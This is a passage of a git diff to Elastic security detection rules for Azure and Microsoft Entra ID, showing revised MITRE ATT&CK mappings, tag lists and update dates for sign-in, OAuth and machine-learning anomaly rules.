b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml index 349868f15fa..84bf8f56d93 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/17" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/20" [rule] author = ["Elastic"] @@ -139,34 +139,44 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml index 102f666f4aa..d8d3ad94d2c 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/24" [rule] author = ["Elastic"] @@ -66,7 +66,15 @@ references = [ risk_score = 47 rule_id = "14fa0285-fe78-4843-ac8e-f4b481f49da9" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-in Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "query" @@ -131,31 +139,41 @@ event.outcome: "success" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml index b650e686492..f21da0d5140 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/03" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/15" [rule] author = ["Elastic"] @@ -131,21 +131,44 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[[rule.threat.technique]] +id = "T1656" +name = "Impersonation" +reference = "https://attack.mitre.org/techniques/T1656/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name", "azure.signinlogs.properties.app_id"] diff --git a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml index eb4ef151eb7..470aa856ca8 100644 --- a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml +++ b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -90,18 +90,36 @@ event.dataset:azure.signinlogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml index 38af402e39f..9d467e9edc0 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/29" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] @@ -78,7 +78,17 @@ To use this rule, ensure that Microsoft Entra ID Protection logs are being colle For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Use Case: Risk Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Use Case: Risk Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -112,17 +122,40 @@ value = "low" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" @@ -130,21 +163,17 @@ reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml index d22b4a05914..e70380965a8 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml @@ -3,7 +3,7 @@ creation_date = "2025/06/02" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] @@ -119,21 +119,58 @@ value = "low" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml index 23eb23df53f..da8c29614c4 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/15" [rule] author = ["Elastic"] @@ -66,7 +66,17 @@ references = ["https://securityscorecard.com/wp-content/uploads/2025/02/MassiveB risk_score = 47 rule_id = "c766bc56-fdca-11ef-b194-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -113,39 +123,34 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml index d8c10af6a3e..6ec4110788e 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -94,21 +94,52 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml index 7ec92bf9f21..a80ea2d7227 100644 --- a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml +++ b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -74,7 +74,17 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration. """ severity = "high" -tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "esql" @@ -183,31 +193,40 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml index c41eda20e66..53b7a160471 100644 --- a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml +++ b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/20" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ references = [ risk_score = 21 rule_id = "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Resources: Investigation Guide", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "new_terms" @@ -106,39 +114,34 @@ event.dataset: "azure.graphactivitylogs" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/ml_azure_event_failures.toml b/rules/integrations/azure/ml_azure_event_failures.toml index e5dcf556327..273f46e76a5 100644 --- a/rules/integrations/azure/ml_azure_event_failures.toml +++ b/rules/integrations/azure/ml_azure_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 @@ -79,7 +79,14 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "1eb74889-18c5-4f78-8010-d8aceb7a9ef4" severity = "low" -tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] @@ -90,13 +97,15 @@ id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -105,3 +114,11 @@ framework = "MITRE ATT&CK" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml index a2eb55186b4..9e1182f57d9 100644 --- a/rules/integrations/azure/ml_azure_rare_event_failures.toml +++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 @@ -88,3 +88,61 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/azure/ml_azure_rare_method_by_city.toml b/rules/integrations/azure/ml_azure_rare_method_by_city.toml index f9a6f0637fe..84f94ffc52b 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_city.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 @@ -80,12 +80,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "ce08cdb8-e6cb-46bb-a7cc-16d17547323f" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -95,8 +107,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_country.toml b/rules/integrations/azure/ml_azure_rare_method_by_country.toml index 82337ac08ee..bbaf6442692 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_country.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 50 @@ -79,12 +79,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "76de17b9-af25-49a0-9378-02888b6bb3a2" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -94,8 +106,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_user.toml b/rules/integrations/azure/ml_azure_rare_method_by_user.toml index 2a492ccadcb..2dd9dacbf77 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_user.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] anomaly_threshold = 75 @@ -78,12 +78,24 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "81892f44-4946-4b27-95d3-1d8929b114a7" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id 